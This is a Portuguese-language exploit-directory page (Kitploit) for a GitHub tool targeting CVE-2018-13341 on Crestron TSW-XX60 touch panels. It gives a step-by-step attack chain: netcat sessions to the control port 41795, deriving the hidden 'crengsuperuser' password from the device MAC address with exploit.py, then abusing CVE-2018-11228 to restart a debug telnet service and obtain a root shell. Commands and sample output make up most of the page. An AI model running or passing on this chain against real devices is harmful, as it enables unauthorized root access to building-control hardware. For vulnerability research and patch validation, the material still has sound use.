Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-13341 — Esta ferramenta tem como objetivo explorar o CVE-2018-13341 | Kitploit
Ferramentas/GitHubGitHub/rajchowdhury240/cve-2018-13341
Segurança de Sistemas EmbarcadosAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança de Hardware e IoT
GitHubrajchowdhury240/cve-2018-13341

CVE-2018-13341

Esta ferramenta tem como objetivo explorar o CVE-2018-13341

Ver Repositório
há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-13341

Esta ferramenta tem como objetivo explorar o CVE-2018-13341. Usando o endereço MAC do dispositivo alvo, você pode recuperar a senha da conta oculta "crengsuperuser" que possui privilégios elevados e permite executar comandos SUDO.

O Protocolo Crestron Toolbox (CTP) pode ser acessado através da porta 41795 no dispositivo TSW-XX60.

root@kitploit:~
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

Requisitos

Esta ferramenta requer o módulo CryptoGraphy.

root@kitploit:~
# pip3 install cryptography

OU

root@kitploit:~
# pip3 install -r requirements.txt

Primeiros Passos

root@kitploit:~
usage: exploit.py [-h] [-m MAC]


# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass

Explorando o CVE-2018-11228

O CVE-2018-11228 permite RCE não autenticado através do Serviço Bash Shell no Protocolo Terminal Crestron (CTP). Após obter a senha da conta oculta "crengsuperuser", você pode obter acesso root na máquina.

root@kitploit:~
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

Em seguida, em um novo shell, você pode obter acesso root na máquina.

root@kitploit:~
# telnet w.x.y.z

bash# whoami
root
root@kitploit:~
Credit Goes to : axcheron 
Baixar ferramenta